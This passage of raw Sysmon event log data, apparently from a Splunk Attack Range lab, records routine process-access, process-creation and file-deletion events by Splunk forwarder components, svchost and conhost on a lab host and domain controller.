Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982066Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.098{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E81-6151-357A-00000000FD01}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982065Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.098{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982064Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.098{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982063Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.098{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982062Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.098{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982061Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.098{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982060Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.098{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982059Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.098{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982058Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.098{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982057Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.082{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982056Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.082{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8E81-6151-357A-00000000FD01}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000982055Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.082{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E81-6151-357A-00000000FD01}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000982054Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.083{69CF5F33-8E81-6151-357A-00000000FD01}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057664Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:30.814{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FD70B92C9ADFD11B0694E075AE0E712,SHA256=935A32E7CFF69F94E06D21ED7CEFFF3C121CB1BDDEF7FDDE83CD427B4A1A1CEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057663Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:30.814{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=98936F75091347A9A440BCC83B004B9F,SHA256=2441D677D35CC7A8A0393157CFD1F212DF355AB555228FA49ABB74CC73F0C7CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057662Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:30.814{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E82-6151-D500-00000000FD01}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057661Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:30.814{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057660Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:30.814{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057659Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:30.814{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057658Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:30.814{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057657Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:30.814{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8E82-6151-D500-00000000FD01}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057656Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:30.814{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E82-6151-D500-00000000FD01}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057655Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:30.815{5EBD8912-8E82-6151-D500-00000000FD01}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057654Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:30.424{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4D2E3C8AEE324B54BA25736A0A2A07F,SHA256=A17F6D41D1AA1FCDE5C0FF576F7C34B4A26D9D362496A284773B38D881A351E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982071Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:30.238{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DFEE2724C6792A5542374E677357145,SHA256=C6CB97ABBDA2B25B89096A7B670E08AB46AB91B8E2D81A2564BE6290D306295A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057678Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:31.830{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FD70B92C9ADFD11B0694E075AE0E712,SHA256=935A32E7CFF69F94E06D21ED7CEFFF3C121CB1BDDEF7FDDE83CD427B4A1A1CEB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057677Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:31.674{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E83-6151-D600-00000000FD01}5908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057676Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:31.674{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057675Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:31.674{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057674Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 